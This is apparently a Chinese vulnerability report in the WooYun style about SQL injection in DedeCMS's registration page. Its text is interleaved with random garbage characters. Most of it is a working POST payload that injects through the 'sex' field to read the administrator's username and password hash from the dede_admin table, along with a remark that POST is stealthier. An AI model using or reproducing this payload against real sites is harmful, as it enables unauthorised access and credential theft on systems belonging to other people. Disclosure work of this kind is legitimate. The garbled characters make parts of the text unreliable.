漏洞类型: SQL注射漏洞
4 W( o, ^0 E0 `% c; z; T简要描述:( p' {0 t, z7 u
x( |' F, t8 M- D. \+ O8 W
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.* X; S3 R' \ _# u9 \" j4 t
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.) Q7 \0 `0 d" b3 ?, s8 x* l7 _5 M
详细说明:跟这个漏洞7 E: J$ b! f- K) b- V @
0 e. O5 A$ W. b' f4 ~# p
WooYun: Dedecms SQL注射导致审核机制绕过漏洞( |2 {$ L- ~3 Y8 B s
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.
+ M0 V9 d7 I, L$ k; W- t" @# O2 zPOST提交以下数据,其实不用POST提交的,这样隐蔽点.* {/ p9 K) Y y8 j
- ?$ W5 f8 j8 F+ g" e# J" b4 E: h
www.political-security.com/member/reg_new.php
8 D# p0 b1 `2 i' g( p . t. p" S, G$ A5 Z
POST
5 q2 C, ^9 l4 Z7 L % J% b# q8 `4 k# l/ F- }$ A
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
, z7 l- x( ?1 {. P0 d) r8 ?userid=c4rp3nt3r&uname=c4rp3nt3r
! F& t6 E0 F3 ?4 e2 n0 U8 x&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss' i, U; ?5 \7 [; S) h/ x% q
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,8 V0 G. a. A9 R q6 |2 v% t# o
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');9 ^7 A# k# v- L' X: R
%00&vdcode=glos&agree= |